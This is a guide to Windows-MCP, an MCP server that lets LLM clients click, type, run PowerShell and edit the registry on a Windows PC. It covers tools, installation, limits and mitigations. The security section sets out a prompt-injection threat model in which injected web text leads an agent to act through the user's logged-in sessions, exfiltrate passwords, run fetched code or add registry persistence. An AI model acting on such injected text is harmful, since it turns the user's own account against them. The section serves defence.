Windows-MCP: AI Computer Use on Windows
Windows-MCP is the MCP server that turns a regular Windows PC into something Claude, Cursor, or Codex CLI can drive directly — click, type, screenshot, run PowerShell, edit the registry. It works with any LLM (no vision required) and installs in one uvx command. It is also the most dangerous server you can wire into a model, because it inherits every permission of the user who launched it. This guide covers what each tool does, the install path for every client, what breaks on Windows Store Claude and inside WSL, what the project cannot do (yet), and the safety pattern we use before pointing it at anything important.

On this page
- TL;DR + what you need
- What Windows-MCP is
- Why it exists
- The 19 tools, mapped
- Install (every client)
- Smallest end-to-end example
- Snapshot vs Screenshot
- What we got wrong
- Common mistakes
- Security: the section that matters
- Performance and limits
- Who this is for / not for
- Community signal
- The verdict
- The bigger picture
- FAQ
- Glossary
- All sources & links
TL;DR + what you actually need
The four things you will keep typing if you use Windows-MCP:
- Install command: `uvx windows-mcp serve`. That is the whole runtime. PyPI ships the package; `uv` fetches Python 3.13, builds the venv, and starts the MCP server over stdio.
- Repo: github.com/CursorTouch/Windows-MCP. MIT-licensed, maintained by Jeomon George under the CursorTouch org. Python 3.13+, Windows 7 through 11.
- Tools exposed: 19 of them. Click, Type, Scroll, Move, Shortcut, Wait, WaitFor, Screenshot, Snapshot, App, PowerShell, FileSystem, Scrape, MultiSelect, MultiEdit, Clipboard, Process, Notification, Registry. Full list below.
- What it cannot do: click through UAC prompts (Secure Desktop isolation), automate video games, do reliable per-character text selection inside a paragraph, or substitute for an IDE's edit primitives. Workarounds in the “what we got wrong” section.
Before you wire it up
Windows-MCP has the same blast radius as your Windows user account. If your client supports “auto-approve all tools,” turn that off before installing. The per-tool approval prompt is the only thing standing between “the agent did something useful” and “the agent typed your password into a Discord chat.”
What Windows-MCP actually is
Most MCP servers are wrappers around an API: Notion-MCP hits the Notion REST API, Slack-MCP hits Slack, Stripe-MCP hits Stripe. Windows-MCP is in a different category — it is a wrapper around the operating system itself. It exposes the same primitives a human uses with mouse, keyboard, and screen, then ships them as MCP tools your model can call.
Concretely, it spawns a local Python subprocess that talks Microsoft UI Automation (UIA) to enumerate the accessibility tree of every running window, uses Win32 SendInput to inject mouse and keyboard events, calls BitBlt-equivalent capture for screenshots, and shells out to powershell.exe for the rest. The MCP server layer wraps all of that in JSON-RPC over stdio. From the model’s perspective it is just another tool catalog; from Windows’s perspective it is a perfectly normal user-mode program doing perfectly normal user-mode things.
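To make the "JSON-RPC over stdio" layer concrete, here is a minimal sketch of what one tool invocation looks like on the wire. The `tools/call` method and the `name` / `arguments` fields come from the MCP specification; the tool name `Shortcut` and the `keys` argument are taken from this guide's own examples and are assumptions, not a verified copy of the server's schema.

```python
import json

def make_tool_call(request_id: int, tool: str, arguments: dict) -> str:
    """Serialize one MCP `tools/call` request as a single JSON-RPC 2.0 line."""
    message = {
        "jsonrpc": "2.0",
        "id": request_id,
        "method": "tools/call",
        "params": {"name": tool, "arguments": arguments},
    }
    # The stdio transport is newline-delimited, so the message must stay on one line.
    return json.dumps(message, separators=(",", ":"))

# Assumed tool and argument names; check the server's advertised schema for the real ones.
line = make_tool_call(1, "Shortcut", {"keys": ["Ctrl", "S"]})
print(line)
```

The client writes a line like this to the server's stdin and reads the matching response (same `id`) from its stdout.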
Jeomon George shipped the first cut in May 2025. The README claims Windows-MCP has “reached 2M+ Users in Claude Desktop Extensions” — treat that as a vendor figure rather than an audited number, but the trajectory is real: the repo sits in the top tier of Claude Desktop extension installs and shows up in every serious Windows-agent demo we have seen this year.
Why it exists
Before Windows-MCP, getting an LLM to do anything outside the chat window on Windows required one of three uncomfortable paths. Either you wrote your own PyAutoGUI glue (no UIA awareness, brittle to DPI changes, breaks the moment a window moves). Or you used Anthropic’s Computer Use API, which is vision-only, slow, and only available in Claude’s hosted product. Or you ran Microsoft’s OmniParser to produce screenshot embeddings and built a custom agent loop around it.
Windows-MCP collapses all three into one stdio server. It reads the UIA tree directly — so it has element IDs, control types, and accessible names without needing a vision model. It exposes the result as MCP, which means any client that speaks the protocol can drive it: Claude Desktop, Cursor, Codex CLI, Gemini CLI, Qwen Code, your own LangGraph script. The cost of integration drops from “build the agent loop” to “add four lines to a JSON file.”
The 19 tools, mapped to what you actually do
The full tool catalogue, grouped by mental category. Each one is a single MCP tool with typed arguments — your model picks them like any other tool call.
Input (the “hands”)
- Click — click a screen coordinate or UIA element
- Type — type text into a target element, optional clear-first
- Scroll — vertical or horizontal scroll on a window/region
- Move — pointer movement; supports drag
- Shortcut: keyboard combos like Ctrl+C, Win+L
- MultiSelect: bulk selection with optional Ctrl modifier
- MultiEdit — type into multiple input fields in one call
Sensing (the “eyes”)
- Screenshot — fast pixel capture with cursor position + window list
- Snapshot — full UIA tree with interactive element IDs
- WaitFor — poll until text, window, element, or focus appears
- Wait — plain duration-based pause
Apps & windows
- App — launch, resize, move, switch between apps
- Process — list or terminate running processes
- Notification — show a Windows toast
System & data
- PowerShell — run a shell command, return stdout/stderr/exit
- FileSystem — read, write, copy, move, delete, list, search
- Registry — read/write Windows Registry keys
- Clipboard — read or set the Windows clipboard
- Scrape — fetch and extract content from a webpage
Two patterns to internalize. First: Click and Type take either a coordinate or a UIA element ID from a Snapshot. Coordinates are brittle (window moves, resolution changes); IDs are stable across small rearrangements. The model usually picks IDs once it has a Snapshot. Second: PowerShell is the escape hatch for anything not covered by the other 18 tools: install software, manage services, query WMI, configure the firewall. It is also the tool with the largest blast radius, so its tool-call approval is the one you actually read.
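The "IDs first, coordinates last" rule can be sketched as a small helper. This is an illustration only: the snapshot shape (`id`, `type`, `name`) and the argument keys (`element`, `x`, `y`) are hypothetical stand-ins, not the server's actual schema.

```python
from typing import Optional

def pick_click_target(snapshot: list[dict], name: str,
                      fallback_xy: Optional[tuple[int, int]] = None) -> dict:
    """Prefer a UIA element ID matched by accessible name; fall back to coordinates."""
    for element in snapshot:
        if element.get("name") == name and element.get("id") is not None:
            return {"element": element["id"]}
    if fallback_xy is not None:
        x, y = fallback_xy
        return {"x": x, "y": y}
    raise LookupError(f"no element named {name!r} and no fallback coordinate")

# Hypothetical Snapshot result for a Save As dialog.
snapshot = [
    {"id": "0x4F1", "type": "Edit", "name": "File name:"},
    {"id": "0x4F2", "type": "Button", "name": "Save"},
]
print(pick_click_target(snapshot, "Save"))
print(pick_click_target(snapshot, "Cancel", (412, 280)))
```

The coordinate branch is deliberately the last resort, since it is the one that breaks when a window moves or the display scaling changes.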
Install (every client)
Prereqs once: winget install astral-sh.uv (or the PowerShell installer irm https://astral.sh/uv/install.ps1 | iex). That installs uv and uvx; the Windows-MCP package itself is fetched on first run.
Claude Desktop
Two paths. If you have the extension installed via Claude Desktop’s in-app marketplace, setup is one click. If you are wiring it manually, edit %APPDATA%\Claude\claude_desktop_config.json:
{
  "mcpServers": {
    "windows-mcp": {
      "command": "uvx",
      "args": ["windows-mcp", "serve"]
    }
  }
}
Restart Claude Desktop. If you installed Claude Desktop from the Microsoft Store, the extension path resolves to a virtualized location that breaks editable builds; see the common mistakes section for the fix.
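If the config file already lists other servers, hand-editing it is an easy way to drop a brace or overwrite an entry. A minimal sketch of a non-destructive merge follows; the `example-server` entry is a hypothetical placeholder for whatever is already in your file.

```python
import json

def add_windows_mcp(config: dict) -> dict:
    """Return a copy of a Claude Desktop config with the windows-mcp entry added."""
    merged = dict(config)
    servers = dict(merged.get("mcpServers", {}))
    servers["windows-mcp"] = {"command": "uvx", "args": ["windows-mcp", "serve"]}
    merged["mcpServers"] = servers
    return merged

# Hypothetical existing config with one unrelated server already registered.
existing = {"mcpServers": {"example-server": {"command": "example", "args": []}}}
updated = add_windows_mcp(existing)
print(json.dumps(updated, indent=2))
```

To apply it for real, load `%APPDATA%\Claude\claude_desktop_config.json` with `json.load`, pass the result through `add_windows_mcp`, and write it back with `json.dump` after keeping a backup copy.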
Cursor
Settings → MCP → Add new global MCP server. Paste the same JSON shape, which Cursor writes to ~/.cursor/mcp.json (on Windows, %USERPROFILE%\.cursor\mcp.json):
{
  "mcpServers": {
    "windows-mcp": {
      "command": "uvx",
      "args": ["windows-mcp", "serve"]
    }
  }
}
Claude Code (from WSL)
This one is genuinely tricky — Claude Code lives in Linux (WSL) but Windows-MCP must execute on the Win32 side. The reliable invocation, surfaced from issue #195, is:
# From WSL:
claude mcp add windows-mcp --transport stdio -s user -- \
  powershell.exe -Command "C:\Users\<you>\.local\bin\uvx.exe windows-mcp serve"
The powershell.exe wrapper is what bridges the WSL/Win32 boundary. uvx.exe alone works in shell tests, but Claude Code needs the server registered via claude mcp add, not by hand-editing JSON under ~/.config/Claude/.
Codex CLI / Gemini CLI / Qwen Code
All three speak MCP natively and accept the same uvx windows-mcp serve command in their MCP config files. Codex’s config lives at %USERPROFILE%\.codex\config.toml:
[mcp_servers.windows-mcp]
command = "uvx"
args = ["windows-mcp", "serve"]
The smallest end-to-end example
Fresh install, fresh Claude Desktop session, single prompt: “Open Notepad, type ‘hello from Claude’, and save it as C:\Users\me\hello.txt”. Here is what the model does, in tool calls. Each line is one tool invocation; the indented bullet is what the model passes in.
App
  app: "notepad.exe"
  action: "launch"
  → returns { window_id: 0xAB12, ready: true }
Type
  element: window 0xAB12 / "Text editor"
  text: "hello from Claude"
  → returns { typed: 17 chars }
Shortcut
  keys: ["Ctrl", "S"]
  → returns { sent: true }
WaitFor
  text: "Save As"
  timeout_ms: 5000
  → returns { matched: true, window_id: 0xCD34 }
Type
  element: window 0xCD34 / "File name:"
  text: "C:\Users\me\hello.txt"
  clear_first: true
Click
  element: window 0xCD34 / "Save"
  → returns { clicked: true }
Six tool calls, ~3 seconds end-to-end. The model never sees a pixel: it is operating purely on the UIA tree returned by Snapshot calls that Claude Desktop interleaves automatically. That is the whole pitch in one example.
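The WaitFor step in that trace is what keeps the run from racing the Save As dialog. Conceptually it is a poll-with-timeout loop. The sketch below shows the pattern under stated assumptions: it is not the server's implementation, and `save_as_visible` is a hypothetical stand-in for a real "is this window present yet?" check.

```python
import time
from typing import Callable

def wait_for(condition: Callable[[], bool], timeout_ms: int = 5000,
             interval_ms: int = 100) -> bool:
    """Poll `condition` until it returns True or the timeout elapses."""
    deadline = time.monotonic() + timeout_ms / 1000
    while True:
        if condition():
            return True
        if time.monotonic() >= deadline:
            return False
        time.sleep(interval_ms / 1000)

# Stand-in condition: the dialog "appears" on the third poll.
polls = {"count": 0}

def save_as_visible() -> bool:
    polls["count"] += 1
    return polls["count"] >= 3

matched = wait_for(save_as_visible, timeout_ms=5000, interval_ms=10)
print({"matched": matched, "polls": polls["count"]})
```

A fixed Wait would also work here, but it either wastes time on fast machines or fails on slow ones; polling with a timeout adapts to both.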
Snapshot vs Screenshot — the call that decides everything
The first thing an agent typically does on a new window is pick which sensing tool to call: Snapshot or Screenshot. They look similar in the catalogue but they fail in opposite ways, and the choice you encourage in your prompt drives the whole agent’s reliability.
Snapshot returns the UIA accessibility tree: every interactive element with an ID, a control type (Button, Edit, ComboBox), an accessible name, a bounding rect, and parent/child relations. It is the “structured” option. A model with a Snapshot can confidently click element 0x4F2 labelled “Save” even if the dialog moves. The downsides: it is slower on huge windows (Electron apps with thousands of nodes can take 200–500ms), Firefox historically had a degraded UIA tree until v0.8.1 added an IAccessible2/MSAA fallback, and not all custom-drawn surfaces (game UIs, some Adobe products) expose anything useful.
Screenshot returns pixels plus cursor position and a window list — no element IDs. It is fast (sub-50ms typically) and works for everything that draws to the screen, including the custom surfaces UIA fails on. The downside: the model has to do its own visual grounding, which means either a vision-capable LLM, or your agent doing OCR / template matching on the side. For non-vision models, Snapshot is the right default and you fall back to Screenshot only when Snapshot returns an empty tree.
Opinionated take: start every agent prompt with “always prefer Snapshot; only call Screenshot if Snapshot returns no interactive elements.” You will save token budget and avoid the entire class of “the model clicked at coordinate (412, 280) and missed by one pixel because DPI scaling changed” bugs.
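The same rule can be enforced in an agent loop rather than only requested in a prompt. A minimal sketch, assuming a hypothetical `call_tool` function and hypothetical result shapes (`elements` for Snapshot, `image` for Screenshot):

```python
from typing import Callable

def sense(call_tool: Callable[[str], dict]) -> dict:
    """Call Snapshot first; fall back to Screenshot only when the tree is empty."""
    snapshot = call_tool("Snapshot")
    if snapshot.get("elements"):
        return {"source": "Snapshot", "elements": snapshot["elements"]}
    screenshot = call_tool("Screenshot")
    return {"source": "Screenshot", "image": screenshot.get("image")}

# Fake client: pretends the focused window is a custom-drawn surface with no UIA tree.
def fake_game_window(tool: str) -> dict:
    return {"elements": []} if tool == "Snapshot" else {"image": b"<pixels>"}

print(sense(fake_game_window)["source"])
```

With a window that does expose a tree, the function returns after the Snapshot call and never pays for the Screenshot.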
What we got wrong
Three things we assumed Windows-MCP could do, and ended up burning hours on.
1. We thought Click + Type could handle a UAC prompt. They cannot. UAC dialogs render on the Secure Desktop, a separate desktop object isolated from user-mode processes for anti-spoofing reasons. The agent’s Screenshot returns the dim wallpaper, Click goes to the void, Type goes to the void, the run stalls until a human clicks. We hit this within ten minutes of trying to script “install Node.js silently” the first time. Workarounds: pre-elevate the shell, use winget with already-trusted publishers, or watch issue #212 for the proposed LocalSystem service mode.
2. We tried to use Type for IDE editing. The Type tool inputs whole strings into a focused field. In an IDE that means it appends to the current cursor position with no concept of multi-line selection, indent preservation, or column navigation. It works fine for “type a URL into the address bar” and is hopeless for “edit line 42 of this Python file.” If you want the model to edit code, give it a filesystem MCP server (Desktop Commander, the official filesystem server, or the IDE’s own MCP) and let it write files directly. Windows-MCP’s Type was never designed for diff-based editing.
3. We assumed Process / PowerShell ran with our user’s effective permissions. They do — but Windows runs your interactive user at medium integrity even if you are an admin, until UAC elevates the token. Windows-MCP cannot trigger UAC programmatically, so every “why does schtasks /RU SYSTEM fail with Access Denied?” question gets the same answer: the agent has the same token your unelevated PowerShell has. Pre-run privileged setup in an elevated terminal before handing the box to the agent.
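A cheap preflight for the third point is to check whether the shell that will launch the server is already elevated. The sketch below uses the Win32 `IsUserAnAdmin` function from shell32 via `ctypes`; treating its result as "this process is elevated" is a common shortcut rather than a full integrity-level query, and the non-Windows branch exists only so the snippet runs anywhere.

```python
import ctypes
import sys

def is_elevated() -> bool:
    """Report whether shell32's IsUserAnAdmin sees an administrator token."""
    if sys.platform != "win32":
        return False  # Not Windows: UAC elevation does not apply.
    try:
        return bool(ctypes.windll.shell32.IsUserAnAdmin())
    except (AttributeError, OSError):
        return False  # Treat lookup failures as "not elevated".

status = "elevated" if is_elevated() else "not elevated"
print(f"Launching shell is {status}")
```

If this prints "not elevated", anything the agent runs through PowerShell or Process will hit the same Access Denied errors your own unelevated terminal would.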
Common mistakes (sourced from GitHub Issues)
Installing the Microsoft Store version of Claude Desktop and expecting paths to match
Root cause: MSIX filesystem virtualization redirects the extension directory to %LOCALAPPDATA%\Packages\Claude_pzs8sxrjxfjjc\LocalCache\..., but the manifest’s ${__dirname} still resolves to %APPDATA%\Roaming\Claude\..., which doesn’t exist. uv run --directory fails with egg_base: ‘.’ does not exist.
Fix: change the manifest to invoke the prebuilt venv exe directly, or use uvx windows-mcp from PyPI which avoids the editable-build path entirely. Issue #213 tracks the manifest fix.
Forgetting powershell.exe when wiring from WSL
Root cause: WSL exposes uvx.exe on PATH but Claude Code spawns it without the Win32 environment block, so the Python subprocess can’t resolve Windows DLLs or paths predictably.
Fix: always invoke through powershell.exe -Command, which gives the child process a real Win32 session.
Using $env:COMPUTERNAME in scripts run via the PowerShell tool
Root cause: the subprocess inherits a stripped environment block. COMPUTERNAME is populated by the session manager at logon and is absent in non-interactive process environments.
Fix: use [System.Environment]::MachineName — it reads from the .NET runtime, not the env block, and returns the correct hostname every time.
Trusting Click’s coordinate mode across DPI changes
Root cause: coordinate-based clicks don’t adjust for per-monitor DPI; a 1920×1080 laptop with 150% scaling and an external 4K monitor at 100% will see Click coordinates shift by the scale factor depending on which display the target window is on.
Fix: always click UIA element IDs from Snapshot, not raw coordinates. The IDs carry their own DPI-aware bounding rects.
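The size of the miss is plain arithmetic. A minimal sketch of the logical-to-physical conversion, using the (412, 280) coordinate from the Snapshot vs Screenshot section; the helper name is hypothetical and the rounding is a simplification of what Windows does.

```python
def logical_to_physical(x: int, y: int, scale_percent: int) -> tuple[int, int]:
    """Convert logical coordinates to device pixels for a given display scale."""
    factor = scale_percent / 100
    return round(x * factor), round(y * factor)

point = (412, 280)
print(logical_to_physical(*point, 100))  # (412, 280)
print(logical_to_physical(*point, 150))  # (618, 420)
```

The same logical point lands 206 pixels right and 140 pixels down on the 150% display, which is more than enough to click the wrong control.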
Security: the section that matters
Windows-MCP is the most dangerous server in the MCP ecosystem to misconfigure. The README states this plainly: “Windows-MCP operates with full system access and can perform irreversible operations.” The threat model is not abstract. With Click, Type, and App, a model can:
- Open your browser to an authenticated tab and act as you on any site you’re logged into.
- Type into your password manager and exfiltrate via Clipboard + a webhook.
- Run `powershell -Command "Invoke-WebRequest ..."` to fetch and execute arbitrary code.
- Edit the Registry to add a persistence mechanism that survives reboot.
- Send a Slack message under your account before you notice.
All of these are within the scope of legitimate use. The question is whether the model triggers them because you asked for them or because injected text told it to (prompt injection from a scraped page is the realistic vector). The mitigations that actually work, ranked from weakest to strongest:
- Keep per-tool approval on. If your client supports an “auto-approve all tools” flag, never enable it with Windows-MCP wired in. The approval prompt is the only thing forcing a human to look at every `powershell` invocation.
- Document blocked commands. Windows-MCP does not ship a built-in command allowlist, so wrap the PowerShell tool with a system prompt that enumerates what it must not run (`curl ... | iex`, `rm` of system paths, `net user`, registry writes outside `HKCU`). The model will not always obey, but it raises the floor.
- Scope by VM. Run Windows-MCP inside a dedicated Windows 11 VM with no shared credentials, no enterprise SSO, and snapshot-based reset. The repo explicitly recommends this for any unattended use.
- Pair with a policy proxy. Issue #189 discusses PolicyLayer/Intercept as a wrapper that enforces rate limits and require-approval rules on individual tools.
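A blocked-command list in a system prompt is advisory; the same list can also be checked in code before a PowerShell call is approved. The sketch below is illustrative only: the patterns are a small, incomplete sample, the function name is hypothetical, and a determined attacker can evade regex matching with aliases or encoding.

```python
import re

# Illustrative, incomplete denylist: (pattern, reason). Matched case-insensitively.
BLOCKED_PATTERNS = [
    (r"\|\s*(iex|invoke-expression)\b", "pipes content into Invoke-Expression"),
    (r"\bnet\s+user\b", "manages local user accounts"),
    (r"\b(rm|del|remove-item)\b.*\bc:\\windows\b", "deletes under C:\\Windows"),
    (r"\b(set-itemproperty|new-itemproperty|reg\s+add)\b.*\bhk(lm|ey_local_machine)\b",
     "writes to the machine-wide registry hive (HKLM)"),
]

def check_command(command: str) -> list[str]:
    """Return the reasons a command is blocked; an empty list means no match."""
    return [reason for pattern, reason in BLOCKED_PATTERNS
            if re.search(pattern, command, re.IGNORECASE)]

print(check_command(r"Get-ChildItem C:\Users"))
print(check_command("curl https://example.invalid/a.ps1 | iex"))
print(check_command(r"Set-ItemProperty -Path HKLM:\Software\X -Name a -Value 1"))
```

Like the system-prompt version, this raises the floor rather than closing the hole, so it belongs alongside per-tool approval and a VM, not in place of them.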
The other thing worth knowing: in May 2026 the project patched GHSA-vrxg-gm77-7q5g. The HTTP transports (sse, streamable-http) were emitting Access-Control-Allow-Origin: *, which let any web page in any tab cross-fetch the MCP endpoint if you exposed it over the network. Fixed in v0.7.5; if you run an HTTP transport, you want to be on a recent release with the host-header / CORS check enabled.
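For readers unfamiliar with why a wildcard is the problem, here is a minimal sketch of the safer pattern: echo the request's Origin only when it is on an explicit allowlist. This is not the project's actual patch; the function name and the allowlisted origins are hypothetical.

```python
from typing import Optional
from urllib.parse import urlsplit

# Hypothetical allowlist; a real deployment would list its own trusted origins.
ALLOWED_ORIGINS = {"http://localhost:8000", "http://127.0.0.1:8000"}

def cors_headers_for(origin: Optional[str]) -> dict[str, str]:
    """Echo the Origin only if it is allowlisted; never answer with '*'."""
    if origin is None:
        return {}
    parts = urlsplit(origin)
    normalized = f"{parts.scheme}://{parts.netloc}".lower()
    if normalized in ALLOWED_ORIGINS:
        return {"Access-Control-Allow-Origin": normalized, "Vary": "Origin"}
    return {}

print(cors_headers_for("http://localhost:8000"))
print(cors_headers_for("https://evil.example"))
```

With no Access-Control-Allow-Origin header in the response, the browser refuses to hand the response to the page that issued the cross-origin request.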
Performance and limits
Per the README, typical tool latency is 0.2 to 0.5 seconds end-to-end — consistent with our own runs on a mid-tier laptop. Breakdown:
- Click / Type / Shortcut: ~50–100ms; pure Win32 injection.
- Screenshot: ~30–60ms for a single primary display; multi-monitor adds a frame.
- Snapshot (UIA tree): 100–500ms depending on window complexity. Electron apps and modern Office windows are the slow end. v0.7.4 halved this by deduplicating COM calls per node.
- PowerShell: bounded by whatever PowerShell is doing. Spawning `pwsh` cold-starts in ~300ms; subsequent calls reuse the process.
- App launch: dominated by the app itself; the tool returns the moment the window is ready.
Hard limits worth knowing:
- Can’t select arbitrary text ranges inside a paragraph — UIA exposes text by element, not by character range.
- Can’t automate most video games — DirectX surfaces don’t expose a UIA tree, and Snapshot returns empty.
- Type-Tool input goes whole-string; no in-line IDE editing primitives.
- App-Tool launch assumes English-locale process names by default.
Who this is for / who it is not for
Use it if you...
- Are running QA on a Windows desktop app and want the model to drive UI flows.
- Want one-prompt setup of dev environments inside a throwaway Windows VM.
- Need to drive enterprise Windows apps (SAP GUI, legacy WPF) that have no API.
- Are building an agent that bridges chat → desktop → PowerShell.
- Want to use a non-vision model for desktop automation (this is the standout feature).
Skip it if you...
- Need cross-platform support — macOS and Linux are out of scope (use Anthropic Computer Use or OmniParser).
- Want IDE-grade code editing — pair with a filesystem MCP instead.
- Are automating games or DirectX surfaces — UIA tree is empty there.
- Cannot run a per-tool approval prompt and have no VM for sandboxing.
- Need elevated/SYSTEM operations on every call — UAC isolation makes that intractable today.
Community signal
The repo’s issue tracker is the most honest source of community sentiment. Three threads worth reading before you commit:
- #212 — Add optional service mode to see and handle UAC prompts is the longest, most thoughtful feature request on the repo. It reads like a small RFC: explains why the current user-mode design hits a wall on autonomous Windows automation, proposes a two-process design (LocalSystem service + user-session broker), enumerates the security caveats, and offers a prototype PR. Open at time of writing; the resolution will reshape what fully-unattended Windows-MCP agents can do.
- #189 (Add policy enforcement for OS-level UI automation) is the contrarian voice. Its core argument: any server with `mouse_click` + `keyboard_type` is “a full system access vector,” and that deserves more than a per-tool approval prompt. It proposes wrapping Windows-MCP in a policy proxy with rate limits and require-approval rules. We agree.
- #194 (Support for automating Windows Server via RDP) captures the enterprise-cloud gap: Windows-MCP is local-only today, and the streamable-http transport is the documented workaround for remote work. First-class RDP transport is requested but not on the near-term roadmap.
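The two controls named in #189, rate limits and require-approval rules, are simple to picture in code. The sketch below is a toy model of such a gate, not the API of PolicyLayer/Intercept or any real proxy; the class and its parameters are hypothetical.

```python
import time
from collections import defaultdict, deque
from typing import Callable

class ToolPolicy:
    """Per-tool gate: optional human approval plus a sliding-window rate limit."""

    def __init__(self, max_calls: int, window_s: float, needs_approval: set[str],
                 clock: Callable[[], float] = time.monotonic):
        self.max_calls = max_calls
        self.window_s = window_s
        self.needs_approval = needs_approval
        self.clock = clock
        self.history: dict[str, deque] = defaultdict(deque)

    def decide(self, tool: str, approved: bool = False) -> str:
        if tool in self.needs_approval and not approved:
            return "require-approval"
        now = self.clock()
        calls = self.history[tool]
        while calls and now - calls[0] >= self.window_s:
            calls.popleft()  # Drop calls that fell out of the window.
        if len(calls) >= self.max_calls:
            return "rate-limited"
        calls.append(now)
        return "allow"

# Fixed clock so the example is deterministic: every call happens at t=0.
policy = ToolPolicy(max_calls=2, window_s=1.0,
                    needs_approval={"PowerShell", "Registry"}, clock=lambda: 0.0)
print([policy.decide("Click") for _ in range(3)])
print(policy.decide("PowerShell"))
```

The injectable clock is there only to make the behavior testable; a real proxy would sit between the client and the server and apply a decision like this to each `tools/call` request.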
On Hacker News, the project’s own submission (HN 44375240) was quiet, but the broader Windows-on-MCP conversation — including Microsoft’s own May 2025 post on securing MCP on Windows — surfaces the same tension: the desktop is the most useful thing to give an agent, and also the most dangerous.
The verdict
Our take
Windows-MCP is the right tool for Windows desktop automation in 2026, full stop — especially if you want a non-vision model in the loop. Install it inside a Windows VM with snapshots, leave per-tool approval on, and pair it with a filesystem MCP for editing work. Skip it on your daily-driver laptop unless you are very disciplined about which model you give it to, and skip it entirely if you need cross-platform (use Anthropic Computer Use or OmniParser) or fully unattended runs that touch UAC (wait for the LocalSystem service mode in #212).
The bigger picture
Windows-MCP sits in a three-way landscape of computer-use approaches. Each one optimizes for a different bottleneck.
- Windows-MCP — UIA-tree first, works with any text-only LLM, Windows-only, local install. Best when you have a Windows-only task and want to bring your own model.
- Anthropic Computer Use — pixel + vision-first, Claude-only, hosted. Best when you want cross-platform (it works on Linux desktops out of the box via the reference container) and don’t mind the higher per-step latency and Claude lock-in.
- Microsoft OmniParser + UI-TARS — pure-vision GUI agents from Microsoft Research and ByteDance. Best when accessibility trees don’t exist (games, custom-drawn surfaces, mobile screen mirroring) and you have GPU budget for vision inference on every step.
The longer-term trajectory: Microsoft is pushing “MCP native to Windows 11” (the May 2025 Windows blog post above), which means Windows-MCP’s “wrap the OS in MCP” pattern is likely to get a first-party variant. The bet for Windows-MCP’s relevance is that it stays the lightweight, no-vendor, any-model option even after the OS ships its own. The bet is reasonable.
Frequently asked questions
What is Windows-MCP?
Windows-MCP is an open-source MCP server by Jeomon George (CursorTouch) that lets Claude, Cursor, Codex CLI, or any MCP-speaking client drive a Windows PC. It exposes 19 tools (Click, Type, Scroll, Screenshot, Snapshot, App, PowerShell, FileSystem, Scrape, Clipboard, Process, Registry and a handful more) so the model can move the mouse, type into apps, run shell commands, read files and inspect the UI tree. Python 3.13+, MIT-licensed, Windows 7 through 11. Install with `uvx windows-mcp serve`.
Do I need GPT-4 Vision or Claude Vision to use Windows-MCP?
No. Windows-MCP works with text-only models because it pulls the Windows UI Automation (UIA) accessibility tree, not screenshots, so Click, Type and friends operate on element IDs the way a screen reader would. The Screenshot tool exists for when a vision model wants to look (Snapshot is the structured, text-only view), but the project's whole pitch is that you don't have to: GPT-4o-mini, Claude Sonnet, and even local models like Qwen-Coder can run agents on it. That's the main thing it does differently from OmniParser or UI-TARS, both of which assume a vision backbone.
Is Windows-MCP safe to install?
It is exactly as safe as handing your laptop password to whoever is driving the model. Windows-MCP runs in your user-mode session and inherits every permission you have: it can read your files, open your browser to authenticated tabs, type into your password manager, and run PowerShell. The README states this plainly: "Windows-MCP operates with full system access and can perform irreversible operations." The only safety control is the human-approval prompt your MCP client shows on each tool call — keep that on. For untrusted prompts or autonomous agents, run it in a Windows VM or test box, never on the laptop with your real keys.
Can Windows-MCP click through a UAC prompt?
No. UAC consent prompts render on a separate Windows desktop object called the Secure Desktop, isolated from user-mode processes for anti-spoofing reasons. Windows-MCP runs as your user, so its Screenshot tool sees the dim frozen wallpaper and its Click / Type calls fall on the floor. There is an open issue (#212) proposing an optional LocalSystem service mode to fix this, but until that lands, an agent that triggers a UAC dialog stalls until a human clicks. Plan installs and admin tasks accordingly, or pre-run them in an elevated terminal.
Does Windows-MCP work with Claude Code or WSL?
Yes, but the wiring is unusual. Claude Code typically runs inside WSL (Linux), while Windows-MCP must execute on the Windows side. The working pattern, surfaced from issue #195, is to register the server via `claude mcp add windows-mcp --transport stdio -s user -- powershell.exe -Command "C:\Users\<you>\.local\bin\uvx.exe windows-mcp serve"`. The `powershell.exe` wrapper bridges the WSL → Win32 boundary. Direct invocation of `uvx.exe` from WSL works in shell tests, but Claude Code needs the server registered explicitly via its CLI, not by hand-editing JSON.
What's the difference between Windows-MCP and Windows-Use?
Same author, different layer. Windows-MCP is the protocol server — it exposes desktop tools over MCP and any client can drive it. Windows-Use is a higher-level agent built on top of Windows-MCP that bundles its own loop, prompt, and decision logic. Use Windows-MCP when you want Claude, Cursor or Codex to do the thinking and just need the desktop primitives. Use Windows-Use when you want a turnkey Windows agent without writing the orchestration yourself. Both live under the CursorTouch GitHub org.
Can I run Windows-MCP on a remote server via RDP?
Not directly. Windows-MCP is local-only by design — it runs on the Windows machine it's automating. For remote servers, install it on the server itself and expose the MCP endpoint over `--transport streamable-http`. Then your local client connects across the network. The repo's open issue #194 tracks first-class RDP transport as a feature request; today it's not supported. For multi-instance cloud automation (EC2, Azure VMs) the streamable-http transport plus an SSH tunnel is the documented path.
Why does $env:COMPUTERNAME return empty when called via Windows-MCP?
The PowerShell tool spawns a subprocess without inheriting the full Windows user environment block. `COMPUTERNAME` is populated by the session manager at logon and is missing in stripped non-interactive process environments. Workaround: use `[System.Environment]::MachineName`, which reads from the .NET runtime and returns the correct hostname inside the Windows-MCP context. Other `$env:` variables (USERDOMAIN, USERPROFILE flavors) may show the same gap. This is documented in issue #208.
Glossary
- MCP
- Model Context Protocol — the JSON-RPC wire format Anthropic released in late 2024 that lets any LLM client talk to any tool server.
- UIA
- UI Automation — Microsoft’s accessibility tree API that exposes every UI element with an ID, role, and bounding rect.
- Secure Desktop
- A separate Windows desktop object that hosts UAC consent prompts, isolated from user processes for anti-spoofing.
- UAC
- User Account Control — the elevation mechanism in Windows that requires a click to promote a process from medium to high integrity.
- stdio transport
- MCP transport mode where the client spawns the server as a subprocess and talks over stdin/stdout. Local-only.
- Streamable HTTP transport
- MCP transport mode for remote servers over HTTP with server-sent events. Windows-MCP supports it for cross-host setups.
- uvx
- A shim from Astral’s `uv` Python tooling that runs a one-shot PyPI package without installing it globally.
- MSIX
- Microsoft’s app-packaging format used by Microsoft Store installs. Uses filesystem virtualization that confuses path-resolving build tools.
- DPI scaling
- Per-monitor scale factor in Windows that turns logical coordinates into device pixels. Why raw Click coordinates break across mixed-DPI setups.
- Snapshot vs Screenshot
- In Windows-MCP, Snapshot returns the structured UIA tree; Screenshot returns pixels. Prefer Snapshot when the app exposes it.
- DXT extension
- Claude Desktop’s extension package format. Windows-MCP ships as a DXT plus a raw `uvx` install option.
- Computer Use
